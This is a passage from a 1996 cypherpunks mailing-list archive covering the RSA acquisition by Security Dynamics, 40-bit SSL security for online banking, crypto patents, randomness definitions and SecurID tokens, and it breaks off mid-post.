Content-Type: text/plain


[from SF Examiner somewhere around 12-14 April 96]

..............................................................................

"IRS Worker Took Peek at Celebrities' Records"
[Associated Press]
  Memphis - A former IRS employee who said boredom had led him to peek at
the tax records of President Clinton, Elvis Presley and other famous people
has been acquitted of federal charges.
  Robert Patterson, 38, said it wasn't malicious - he was just trying to
learn how to better use the Internal Revenue Service computers.
  "I was sitting there bored, so I started punching up names," said Patterson.

..............................................................................




Hmmm. _We_ do it, it's "malicious cracking/hacking" and they toss us in the
clink... _they_ do it, and it's "practice" (and they get acquitted). And
_these_ are the people who want to escrow _my_ keys? As IF!

Not only that, but also if the guy's so damn _bored_, why doesn't he spend
some time FIXING the damn computer systems at IRS (see current cover of
Information Week mag). Not that I particularly WANT them to fix the
infernal revenue suckers...

BTW, where do they _find_ these people? He's hacking around in Clinton's
tax records and he _doesn't_ expect Secret Service agents crawling up his
yin-yang within minutes? Obviously, "thinking too much" is _not_ this
chap's problem.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Tue, 16 Apr 1996 23:53:20 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: carrick, Blowfish & the NSA
In-Reply-To: <96Apr14.100201edt.1826@cannon.ecf.toronto.edu>
Message-ID: <v03006308ad9938166745@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:01 am  -0700 4/14/96, s1113645@tesla.cc.uottawa.ca wrote:
>Besides, doesn't PGPfone give you a choice of algorithms? (including IDEA?)
>I haven't gotten it yet, no sound card.

PGPfone currently offers Blowfish (fast, iffy) and TripleDES (slow, secure).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Tue, 16 Apr 1996 23:48:43 +0800
To: cypherpunks@toad.com
Subject: [NEWS] Security Dynamics Buys RSA
Message-ID: <v03006309ad9939c9cd91@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain


<http://www.rsa.com/ANNOUNCE/buyout.htm>

For information about RSA:
Patrick Corman or Lisa Croel
Corman/Croel Marketing & Communications (415) 326-9648 or (415) 326-0487
Corman@cerf.net or Lcroel@mediacity.com

FOR IMMEDIATE RELEASE

Security Dynamics to Acquire RSA in Transaction Valued at Approximately
$200 Million

Cambridge MA and Redwood City, CA -- April 15, 1996 -- Security Dynamics
Technologies, Inc. (NASDAQ: SDTI) and RSA Data Security, Inc. today
announced that they have signed a definitive agreement for Security
Dynamics to acquire RSA, a Redwood City, California vendor of encryption
software. The transaction is intended to be carried out by the merger of
RSA and a wholly-owned subsidiary of Security Dynamics in a tax-free
transaction accounted for as a pooling of interests. For the year ended
December 31, 1995, RSA had revenues and net income of approximately
$11,6000,000 and $950,000, respectively.

Upon consummation of the merger, Security Dynamics will issue or reserve
for issuance 4,000,000 shares of its Common Stock in exchange for all of
the outstanding shares and options to acquire shares of RSA. Based on the
closing price of Security Dynamics Common Stock on the Nasdaq Market on
April 12, 1996, the transaction is valued at approximately $200,000,000.
The transaction is scheduled to close in June 1996.

The consummation of the merger is subject to approval by the stockholders
of both Security Dynamics and RSA and the satisfaction of antitrust and
certain other conditions. In connection with the merger agreement, certain
RSA stockholders, who currently own approximately 70% of the outstanding
shares of RSA, have agreed to vote their RSA shares in favor of the merger.

"RSA's technology is an excellent fit with Security Dynamics'
enterprise-wide security solutions," said Charles R. Stuckey, Jr.,
President and Chief Executive Office of Security Dynamics. "In the rapidly
growing Internet and Intranet markets, security has become on of the major
issues. The merger of RSA and Security Dynamics combines our user
identification and authentication technology and RSA's public key and
encryption technology, each of which is a de facto standard. We believe
this brings into a single organization the management and technical talent
needed to bring to market the most effective security applications."

"The synergy between the two companies is outstanding," said Jim Bidzos,
President and Chief Executive Officer of RSA. "RSA and Security Dynamics
technologies must be delivered as an integrated solution to corporate and
Internet users. The best way to accomplish this is for the two companies to
become one."

According to both executives, RSA will continue its existing license
business as a subsidiary of Security Dynamics.

Security Dynamics Technologies, Inc.

Security Dynamics designs, develops, markets and supports a family of
security products used to protect and manage access to computer-based
information resources and is the de facto standard for secure user
identification and authentication. The Company's family of products employ
a patent-protected combination of super smart token technology and software
for hardware access control products to authenticate the identity of users
accessing networked or stand-alone computing resources. The Company's
customers include Fortune 500 companies and financial institutions as well
as academic institutions, research laboratories, hospitals and federal,
state and foreign government organizations.

RSA Data Security, Inc.

RSA is a recognized world leader in cryptography, with millions of copies
of RSA software encryption and authentication technologies installed and in
use worldwide. RSA's encryption technology is embedded in Microsoft
Windows, Netscape Navigator, Intuit's Quicken, Lotus Notes, and hundreds of
other products. RSA technologies are part of existing and proposed
standards for the Internet and World Wide Web, CCITT, ISO, ANSI, and IEEE
as well as business, financial and electronic commerce networks around the
world. RSA develops and markets platform-independent software developers'
kits and end-user products and also provides comprehensive cryptographic
consulting services.

Founded in 1982 by the inventors of the RSA Public Key Cryptosystem, the
company is headquartered in Redwood City, Calif.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 16 Apr 1996 22:55:28 +0800
To: Black Unicorn <cypherpunks@toad.com>
Subject: Re: What can the judge do to me?
Message-ID: <2.2.32.19960416105311.00ce803c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:36 PM 4/12/96 -0400, Black Unicorn wrote:

>I think it's clear, the court literally spells this out, that holding 
>a witness indefinitely until he complies with court orders is within 
>the discretion of a judge.  Compelling through sanctions the 
>production of a "key" (though I'm not sure a crypto key is directly 
>contemplated) is likewise clearly permitted.

In practice though, two years seems to be the limit.  That was the duration
for Dr. Elizabeth Morgan and for the guy in SF in the mid 70's who won the
Irish Sweepstakes and refused to repatriate his winnings so they could be
taxed.  Is anyone aware of a contempt sentence longer than two years?  If no
examples exist, then two years is the limit.

There is always more bluff than reality in enforcement.  See the
Transactional Records Clearing House (http://www.trac.syr.edu/) for real
info on federal criminal referrals and filings.  Total tax fraud and evasion
filings were circa 1000 in 1994, for example.

DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 16 Apr 1996 22:46:15 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: What can the judge do to me?
In-Reply-To: <2.2.32.19960416105311.00ce803c@panix.com>
Message-ID: <Pine.SUN.3.91.960416065243.15421B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 16 Apr 1996, Duncan Frissell wrote:

> At 07:36 PM 4/12/96 -0400, Black Unicorn wrote:
> 
> >I think it's clear, the court literally spells this out, that holding 
> >a witness indefinitely until he complies with court orders is within 
> >the discretion of a judge.  Compelling through sanctions the 
> >production of a "key" (though I'm not sure a crypto key is directly 
> >contemplated) is likewise clearly permitted.
> 
> In practice though, two years seems to be the limit.  That was the duration
> for Dr. Elizabeth Morgan and for the guy in SF in the mid 70's who won the
> Irish Sweepstakes and refused to repatriate his winnings so they could be
> taxed.  Is anyone aware of a contempt sentence longer than two years?  If no
> examples exist, then two years is the limit.

I seem to remember a pair, let me look.

> 
> There is always more bluff than reality in enforcement.  See the
> Transactional Records Clearing House (http://www.trac.syr.edu/) for real
> info on federal criminal referrals and filings.  Total tax fraud and evasion
> filings were circa 1000 in 1994, for example.

Notice that those do not include deficancies which were discovered, 
assessed, and settled without charges.

Doesn't make any difference if it's bluff or reality if you can't or wont 
call.

> DCF
> 
> 
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Adam Pingitore" <Adam_Pingitore@alli.wnyric.org>
Date: Wed, 17 Apr 1996 11:36:16 +0800
To: Ed Carp <jimbell@pacifier.com
Subject: Re[2]: GPS privacy/ECM
Message-ID: <9603168296.AA829685760@ccmail.wnyric.org>
MIME-Version: 1.0
Content-Type: text/plain


          STOP SENDING ME THIS SHIT





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Adam Pingitore" <Adam_Pingitore@alli.wnyric.org>
Date: Wed, 17 Apr 1996 11:15:41 +0800
To: cypherpunks@toad.com
Subject: Re: on corporations and subpoenas
Message-ID: <9603168296.AA829685776@ccmail.wnyric.org>
MIME-Version: 1.0
Content-Type: text/plain


          GET ME OFF THE DAMN LIST





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Adam Pingitore" <Adam_Pingitore@alli.wnyric.org>
Date: Wed, 17 Apr 1996 07:19:30 +0800
To: Raph Levien <cypherpunks@toad.com
Subject: Re: List of reliable remailers
Message-ID: <9603168296.AA829685917@ccmail.wnyric.org>
MIME-Version: 1.0
Content-Type: text/plain


          GET ME OFF THIS DAMN LIST





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Tue, 16 Apr 1996 22:47:15 +0800
To: secret@secret.alias.net (K00l Secrets)
Subject: Re: None
In-Reply-To: <199604160615.BAA16813@paulsdesk.phoenix.net>
Message-ID: <199604161222.HAA23955@homeport.org>
MIME-Version: 1.0
Content-Type: text



See www.homeport.org/~adam/crypto/

K00l Secrets wrote:
| 
| 
| > If the Diffie-Hellmann patent covers all kind of public key crypto,
| > you need a license from Cylink, i.e. BSAFE is not enough, and if it
| > doesn't you can use El Gamal without a license.
| 
| Are there any freely available implementations of El Gamal?
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 17 Apr 1996 04:15:26 +0800
To: Dave Del Torto <cypherpunks@toad.com>
Subject: Re: [IRS] Elvis in Escrow
Message-ID: <m0u9Cvl-00090DC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:40 AM 4/16/96 -0700, Dave Del Torto wrote:
>[from SF Examiner somewhere around 12-14 April 96]
>..............................................................................
>"IRS Worker Took Peek at Celebrities' Records"
>[Associated Press]
>  Memphis - A former IRS employee who said boredom had led him to peek at
>the tax records of President Clinton, Elvis Presley and other famous people
>has been acquitted of federal charges.
>  Robert Patterson, 38, said it wasn't malicious - he was just trying to
>learn how to better use the Internal Revenue Service computers.
>  "I was sitting there bored, so I started punching up names," said Patterson.
>..............................................................................

>Hmmm. _We_ do it, it's "malicious cracking/hacking" and they toss us in the
>clink... _they_ do it, and it's "practice" (and they get acquitted). And
>_these_ are the people who want to escrow _my_ keys? As IF!


I have a solution to this problem.

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Marshall <brucem@wichita.fn.net>
Date: Wed, 17 Apr 1996 02:27:35 +0800
To: cypherpunks@toad.com
Subject: Re: RSA-130 Falls to NFS - Lenstra Posting to sci.crypt.research
In-Reply-To: <199604151824.LAA07600@netcom6.netcom.com>
Message-ID: <Pine.BSI.3.91.960416090319.2962C-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 15 Apr 1996, Vladimir Z. Nuri wrote:

> I have been wondering about malicious hackers getting into these
> pools. would it be possible for them to contribute false data
> that screws up the end results? or are such anomalies easily
> discarded or disregarded by the final processes?

> future implementors of these programs might amuse themselves with
> trying to create such safeguards or anticipate such "attacks" which
> are pretty significant the more the processes become distributed.

    I guess I would have to ask you why you think hackers would be 
interested in these projects in the first place?  Your typical hacker 
would care very little about such a project and in fact may be interested 
in seeing it succeed.  

    However, I do feel that you may have a valid point when switching 
"hackers" to "opponents of the research."  Anyone with an interest in 
preventing or slowing down the progress in such a project would be more 
dangerous in my mind than your average hacker.  

    Preventing that from happening would be necessary if it is decided 
that such a threat truly exists. 

Bruce Marshall




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Watt <watt@sware.com>
Date: Wed, 17 Apr 1996 02:35:44 +0800
To: cypherpunks@toad.com
Subject: Re: Bank transactions on Internet
Message-ID: <9604161346.AA06924@mordred.sware.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PRIVACY-ENHANCED MESSAGE-----
Proc-Type: 4,MIC-CLEAR
Content-Domain: RFC822
Originator-Certificate:
 MIIBvzCCAWkCEFmOln6ip0w49CuyWr9vDVUwDQYJKoZIhvcNAQECBQAwWTELMAkG
 A1UEBhMCVVMxGDAWBgNVBAoTD1NlY3VyZVdhcmUgSW5jLjEXMBUGA1UECxMOU2Vj
 dXJlV2FyZSBQQ0ExFzAVBgNVBAsTDkVuZ2luZWVyaW5nIENBMB4XDTk1MDUwODIw
 MjMzNVoXDTk3MDUwNzIwMjMzNVowcDELMAkGA1UEBhMCVVMxGDAWBgNVBAoTD1Nl
 Y3VyZVdhcmUgSW5jLjEXMBUGA1UECxMOU2VjdXJlV2FyZSBQQ0ExFzAVBgNVBAsT
 DkVuZ2luZWVyaW5nIENBMRUwEwYDVQQDEwxDaGFybGVzIFdhdHQwWTAKBgRVCAEB
 AgICBANLADBIAkEM2ZSp7b6eqDqK5RbPFpd6DGSLjbpHOZU07pUcdgJXiduj9Ytf
 1rsmf/adaplQr+X5FeoIdT/bVSv2MUi3gY0eFwIDAQABMA0GCSqGSIb3DQEBAgUA
 A0EApEjzeBjiSnGImJXgeY1K8HWSufpJ2DpLBF7DYqqIVAX9H7gmfOJhfeGEYVjK
 aTxjgASxqHhzkx7PkOnL4JrN+Q==
MIC-Info: RSA-MD5,RSA,
 ApDNkoCKfI0iz1XP4rYpl2XlbqF9/llmB3tLaunuqLWlnD5+VcGwYDNR/HJQa+AV
 7s41qt0zFhiYbhidj7zh4e8=

> From: Eric Young <eay@mincom.oz.au>
> On Mon, 8 Apr 1996, JR Weaver wrote:
> > with SFNB to purchase my own copy of 128-bit Netscape Navigator. You can make
> > transactions over the net and SFNB does not limit you to 128-bit. Is it really
> > that easy to break 40-bit? Don't you need access to a "fair amount of cpu
> > power" to brute force crack 40bit? As far as I know client authentication is
> Put put it in a word, 'yes'.
> 
> > strictly username & password. What other authentication system exists??
> This would be a very good system to attack.
> 
> ... (details on Eric's break-SSL saga)
> 
> Please remember that I'm not talking about theory.  Besides the person 
> working next to me, no-one at work knew I was participating in the brute 
> force beaking attempt.  Well this is not totally true, the owner of the SGI 
> with 6 R4400 CPU's noticed that I was using a few of the CPU's but they 
> did not know what the programs were doing :-).
> 
> I would say that RC4 40 should not be used if possible, especially to do 
> with anything to do with banking.
> 
> eric (just putting in his own 2 certs worth).

As Chief Scientist for SecureWare and one of the designers of SFNB's
security architecture, I would like to make a couple of points regarding
this thread:

	1. SFNB customers are at absolutely NO RISK from Internet attacks
	2. It's a whole lot harder to break into SFNB than just cracking
	   a 40-bit RC4 key.
	3. 40-bit SSL, when used within a properly designed security
	   framework, is more than adequate for personal banking 
	   transactions.

Along the way I'll outline my understanding of SFNB's plans for future 
security enhancements (as only an advisor to SFNB I cannot speak for them
directly) with the hope of getting some useful feedback from the experts 
on this list.  I'll apologize in advance for the length of this post, but 
while I enjoy this list for its occasional emphasis on crypto, sometimes 
the participents get a little too focused and forget that encryption does 
not equate to security.

First, the U.S. banking system is very nice to account holders.  The banks,
rather than the customers, assume all risk associated with security problems
in telephone banking, ATMs, etc...  Internet banking is no different, which
explains why so few banks have jumped onto the net with real transactions.
If an SFNB customer should lose any funds due to a security problem, SFNB
pays, not the customer.

Second, in order to break the SSL-protected password of an SFNB account
holder, you need access to the encrypted data.  This is not easy to obtain
over the Internet, and would generally require illegal activity in order 
to gain control of a host within the Internet infrastructure or collusion 
with the account holder.  Should an attacker crack the key and obtain 
the account number and password of an SFNB account holder, they are clearly 
warned upon login that they are engaging in illegal activity.  Once they 
have logged in, there is no way to transfer money out of the account 
without leaving a target address and phone number for the recipient.  
Furthermore, any payment to an individual or unknown entity would be 
made in the form of a physical check that would have to be cashed at
a physical bank.  The whole process is heavily audited with real-time 
audit filtering and pattern matching capabilities -- SFNB is, afterall, 
running on a military grade secure operating system (see SWP at 
www.secureware.com).  Any security system that is deployed should be
compared against the value you are trying to protect.  It seems like a 
pretty big risk to an attacker -- and I assure you SFNB will prosecute.

Finally, I whole-heartedly agree that 40-bit encryption is far too weak 
for many applications, and that the current export limitations are absurd.  
I have my own copy of the Xilinx development tool set at home and am
quite capable of using it to design a 40-bit key cracking engine.  I assume 
that others on this list might be able to as well.  However, it is important 
to note that strong encryption does NOT equate to strong security.  
Encryption is merely one of many tools that are available in building 
secure systems.  For example, a Web-based application running over 128-bit 
SSL would still be vulnerable to:

	- attacks against the server host
	- server spoof attacks
	- client side attacks, e.g. a Trojan Horse

In my estimation, all of these are more likely (and more dangerous if 
successful) than an attacker cracking the 40-bit key used for a bank 
transaction.  Any security sensitive application, such as Internet banking, 
that does not protect against all of these attacks is asking for trouble
in the long run.  Note that in the long run the Trojan Horse problem is the 
most severe for a banking application, for the bank cannot control end 
user PCs.  And no matter how good the tools they are provided for their 
protection (see Troy at www.secureware.com), ultimately the bank cannot 
protect users from their own foolish actions.

Also, despite the noise currently being made in Washington about relaxing 
export regulations, the current limitations are reality.  Thus, it has been
SFNB's goal from the start to design a personal banking solution that 
protects against all of these attacks and is secure running over 40-bits.  
At this time, as SFNB does not have this solution fully deployed, SNFB 
offers the 128-bit version of the Netscape browswer FREE to any SFNB 
customer that wants it.  Just call their customer support line.

The trick to secure personal banking at 40-bits is to remember that
encryption can be used for many functions.  For personal checking, it is
the authenticity and integrity of a transaction that must be strongly
protected, not the confidentiality.  For the latter, 40-bits is sufficient,
i.e., while confidentiality of account holder transactions is certainly
important, the value of discovering this information does not justify the
cost of an attack against the encryption.  Thus, if the 40-bit encrypted 
traffic between the browser and server does not contain any repeatable 
authentication information, 40-bits is sufficient.  For commercial accounts
this is not the case and SFNB does is planning to use security beyond SSL.

In the long term SFNB plans to disassociate the authentication of a 
transaction from its encryption through the use of SmartCard-based 
client-side private keys and bank-issued certificates.  This has the
advantage of permitting signatures to obtain non-repudiable transactions, 
making the bank "electronic commerce enabled".  However, this feature 
has not been available in commercial browsers within the originally 
estimated time frame.  We considered running the browsers transparently 
over SecureWare's Hannah product (www.secureware.com) to get client-side 
keying and a stronger protocol than SSL, but SFNB decided it was a better 
business decision to wait for client-side support in the browsers -- i.e, 
the cost to SFNB of distributing and supporting special client-side software 
>> cost of projected loss due to successful attacks on the bank during the 
estimated interval before browser support becomes available.  It is, after 
all, SFNB's decision to make.  They, not the customer, will pay any costs 
associated with a successful attack, whether financial or PR.

But as the availability of client-side certificates has been pushed out, 
we have prepared two interim solutions, both of which solve the list of 
problems above.  SFNB is currently debating whether to deploy one (or both):

1.  Distribute a browser plug-in or locally resident Java applet to 
    calculate an MD5/SHA hash computed over:
	- the user's password
	- a secret key created and distributed by SFNB that is unique to 
	  the account holder
	- a login challenge (random number) issued by the server

    This hash, rather than the password, would be sent over the SSL 
    protected connection to authenticate the user.
	
2.  Distribute SecureID or some other token-based authentication device to
    account holders.  (Remember when banks used to give away toasters?).

With either approach server-spoof attacks are prevented, for the server 
cannot access the local key material or token.  Attacks against 40-bit keys 
are effectively negated, for any such attack would have to be mounted:

	- in real-time before the account holder logs out of the bank and
	  invalidates the session key.  SFNB imposes an inactivity log out.

	- from a gateway through which the account holder's SSL session is 
	  routed in order to grab control of the account holder's session
	  due to the complex cookie mechanism being used.

Note that even our final solution using hardware-based crypto is not 
perfect.  But then there is no such thing as perfect security.  SFNB does
have, even with its current implementation, a system that is more difficult
to defeat than current financial instruments such as paper checks, credit 
cards, ATM cards, etc...

Charles Watt
SecureWare, Inc.

-----END PRIVACY-ENHANCED MESSAGE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 17 Apr 1996 05:49:01 +0800
To: Robin Felix <cypherpunks@toad.com>
Subject: RE: math patents
Message-ID: <m0u9Duq-0008zqC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:21 PM 4/15/96 -0700, Robin Felix wrote:
>At 04/14/96 1457, jim bell may have written:
>>At 09:08 AM 4/14/96 -0800, Lee Tien wrote:
>>>My recollection from law
>>>school is that the law was friendly to math patents in the period before
>>>the Supreme Court weighed in.  There were some PTO denials, which courts
>>>reversed (I think the Court of Claims heard these back then).  So I think
>>>the trend was toward patenting processes even if mathematical until
>>>Gottschalk v. Benson
>
>>I seem to recall reading that one of the breakthrough "algorithm" patents
>>was from the 1970's, in which a rubber-curing/molding process's cure time 
>>was determined by a mathematical formula based on heat, pressure, mold 
>>shape, and a number of other variables.
>
>You're referring to Diamond v. Diehr, 450 U.S. 175, 195 (1981).  I have a 
>half-finished article I wrote in 1994 on software algorithm patents, about 
>32K, available at 
<http://www.delfinsd.delfin.com/felix/Algorithm_Patents.htm.  It's the good 
>part, the background material minus footnotes.  Although it's a bit dated, 
>the description of foundational cases is still accurate.

Thanks for the reference, and yes, the article was very interesting.  As 
usual, it sounds like the legal system has gotten the whole thing screwed up.  

I am still mystified, however!  If I understand the thrust of the legal 
cases you cited, purely mathematical algorithms are still not patentable, 
yet the patents on public-key cryptography are about the most purely 
mathematical ones that could be imagined.  They are not an element in the 
process, they ARE the process.

To recap, I've asserted (with no definitive proof, obviously) that when 
public-key cryptography was invented, in about 1976, the US government 
decided that it wanted to restrict it as much as possible from ordinary US 
citizens.  Due to the 1st amendment, legal restrictions on speech would not 
fly, and copyright was out because that would only have protected one 
particular program, if even that much.  The final alternative, patent 
protection, was essentially unavailable (or thought to be so) because of the 
traditional non-patentability of software and mathematics.

Patents would not have prevented the Russians from using RSA, nor any other 
foreigners, so as far as I can see the only group of people impaired by the 
RSA patent were American citizens as a group.  

To me, there are at least two mysteries that need to be solved here.  The 
first is why the cryptography patents were issued in the first place.  The 
second, and perhaps even more incriminating, has to do with why the patents 
were applied for.  Because the patent application has to be filed within a 
year of disclosure, the RSA patent would have to have been filed at latest 
by April of 1977.  Yet, that predates some of the earliest cases in your 
article by a year or more.  I've never heard a cogent explanation as to how 
R, S, and A decided that a "doomed" patent application was worthwhile, 
unless they had some insider information that the Gottschalk v. Benson case 
would be essentially ignored and the patent granted anyway.

This isn't unrealistic paranoia or conspiracy theory, either.  It is 
reasonable to assume that since the government would be the first, largest 
beneficiary of keeping RSA out of the hands of the public, and since the 
government made up and controlled the patent office and the court system as 
well, it could easily have made a decision that RSA was going to be 
patented, and Messr's Rivest, Shamir, and Adleman told of their luck in 
plenty of time to apply for a patent.  The other cases from 1978 on might 
simply have been window-dressing, to make it look like the courts had had a 
change of heart unrelated to the subject of public-key cryptography.

My question is this:  "Is there anything you're aware of that contradicts 
this impression?"  Or, is there a way to confirm this?








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Wed, 17 Apr 1996 01:56:23 +0800
To: K00l Secrets <secret@secret.alias.net>
Subject: Re: None
In-Reply-To: <199604160615.BAA16813@paulsdesk.phoenix.net>
Message-ID: <Pine.3.89.9604160941.A24249-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 16 Apr 1996, K00l Secrets wrote:

> > If the Diffie-Hellmann patent covers all kind of public key crypto,
> > you need a license from Cylink, i.e. BSAFE is not enough, and if it
> > doesn't you can use El Gamal without a license.
> 
> Are there any freely available implementations of El Gamal?
Wei Dai's crypto++ has pretty much everything, in c++. 
<http://www.eskimo.com/~weidai> has the info and a pointer to
the latest version (2.0) at an export-controlled-site.

The old versions, (1.0 still has the algorithms RSADSI disputed) 
are available in <ftp://ftp.utopia.kacktic.nl/pub/replay/pub/crypto/LIBS> 
under the names crypto10.zip and crypto11.zip (I think). I didn't see 2.0 .

I think Hal Finney's has some of it ported to Java. ( www.portal.com is 
inaccessible at the moment)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 17 Apr 1996 03:07:09 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: why compression doesn't perfectly even out entropy
In-Reply-To: <ad987fec02021004063f@[205.199.118.202]>
Message-ID: <199604161407.KAA15253@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> Well, I don't view any of the "simple definitions" of randomness as
> especially useful; that is, the simple definitions have a kind of
> circularity (implicit in the points we both make). For example, "an object
> is "random" if it has no shorter description than itself," the classic
> Solomonoff-Kolmogorov-Chaitin definition, is quite elegant, but doesn't
> help much in many cases.

Except that it goes against our normal definitions of random in a
crypto context. A string that is compressable might still be
random. There is no reason you can't have a string of 20 1 bits in
a row in a perfectly random sequence, for example. Usually, random
sequences are non-compressable, but it is possible (though very
improbable) for Hamlet to appear out of a random number generator,
and it is of course quite compressable...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 17 Apr 1996 05:12:13 +0800
To: cypherpunks@toad.com
Subject: Re: why compression doesn't perfectly even out entropy
Message-ID: <ad99193c040210040b50@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:07 PM 4/16/96, Perry E. Metzger wrote:
>Timothy C. May writes:
>> Well, I don't view any of the "simple definitions" of randomness as
>> especially useful; that is, the simple definitions have a kind of
>> circularity (implicit in the points we both make). For example, "an object
>> is "random" if it has no shorter description than itself," the classic
>> Solomonoff-Kolmogorov-Chaitin definition, is quite elegant, but doesn't
>> help much in many cases.
>
>Except that it goes against our normal definitions of random in a
>crypto context. A string that is compressable might still be
>random. There is no reason you can't have a string of 20 1 bits in
>a row in a perfectly random sequence, for example. Usually, random
>sequences are non-compressable, but it is possible (though very
>improbable) for Hamlet to appear out of a random number generator,
>and it is of course quite compressable...

Sure, compressibility is not a determinant of randomness....nothing is,
actually. This is my point about there being no simple definition of
randomness.

However, "most" objects derived from a "random-like process" have no
shorter description than themselves, by a variant of the pigeonhole
principle (i.e., there are more things of some size than descriptions of
less than that size, so most "random" objects, are, perforce, not
describable in short descriptions).

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Wed, 17 Apr 1996 02:32:14 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: CDA Court Challenge: Update #7 (Ducks on the Net)
In-Reply-To: <ad987d0e0002100459cc@[205.199.118.202]>
Message-ID: <YlQug3C00YUu0Bzm98@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from cypherpunks: 15-Apr-96 Re: CDA Court Challenge: Up.. by
Timothy C. May@got.net 
> ????
>  
> Apparently "The Netly News" has given up on simple, straightforward
> reporting in favor of "Pop Journalism." Cute headlines instead of
> informative ones.
>  
> (The reason I no longer try to wade through the cuteness of "Wired,"
> another example of postmodernism carried too far.)

The headlines were mine, not The Netly News'. They do not appear on
TNN's web site.

-Declan, now guilty of "cute headlines"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vin@shore.net (Vin McLellan)
Date: Wed, 17 Apr 1996 05:19:51 +0800
To: cypherpunks@toad.com
Subject: Re: RSA & SDI
Message-ID: <v02130501ad98fd7a87b0@[198.115.179.225]>
MIME-Version: 1.0
Content-Type: text/plain


Steve Reid <steve@edmweb.com> exclaimed:

>> It's true:
>> FOR IMMEDIATE RELEASE
>> Security Dynamics to Acquire RSA in Transaction Valued at
>> Approximately $200 Million
>
>Okay, so what do we know about Security Dynamics? What are they expected
>to do about licensing etc?

        I know a lot about SDI's technology and history.  (Under contract
to SDI, I just finished writing a draft FAQ on their ACE/SecurID user
authenication system.  It's unofficial and in-process, but I'm willing to
e-mail the SecurID FAQ to anyone willing to read it and give me comments,
criticism, and suggestions on how to improve it.  Fair warning: it is
20,000+ words and written to educate a lay audience.)

        I haven't heard anything yet about SDI's position on RSA licences;
but I doubt if there will be any surprises in that area soon. Among people
associated with either company, it has been common knowledge that SDI and
RSA folk have been very close for years, on both personal and professional
levels.  RSA's technical expertise has been apparent in SDI's user
authentication system at several levels (albiet undocumented) and SDI's
marketing expertise has doubtless informed RSA's policies in recent years.


        SDI, with over 150 salesmen on the street, fields the largest and
most successful sales force selling Computer Security.  SDI's SecurIDs
tokens dominate the large-site (<1,500 tokens) corporate market for user
authentication tokens with an estimated 70-80 percent of the market --
largely on the basis of the relative ease-of-use of the SecurID over its
challenge/response competitors; SDI's early committment to client/server
environments; and SDI's corporate promise to evolve to meet the changing
CompSec threat.

        A SecurID generates the token's 4-8 digit token-code from an
SDI-proprietary hash that puts Current Time and a token-specific key
through a one-way function to create a PRN that changes every 30 or 60
seconds.  All SecurID authentication calls also require two-factor
validation; both the token-code and a user-memorized PIN must be submitted
to the ACE/Sever for validation.

        There has never been any doubt -- given the evolving risks and the
needs of on-line business community -- that SDI would eventually sell both
authentication and encryption services.  (It has also been obvious for
years that SDI had, in its SecurID token-code, a neat symmetrical
encryption key-generator already in widespread use in many networked
environments.  SDI had a mocked-up system that effectively used a SecurID
token to generate DES keys seven or eight years ago, as I recall -- but
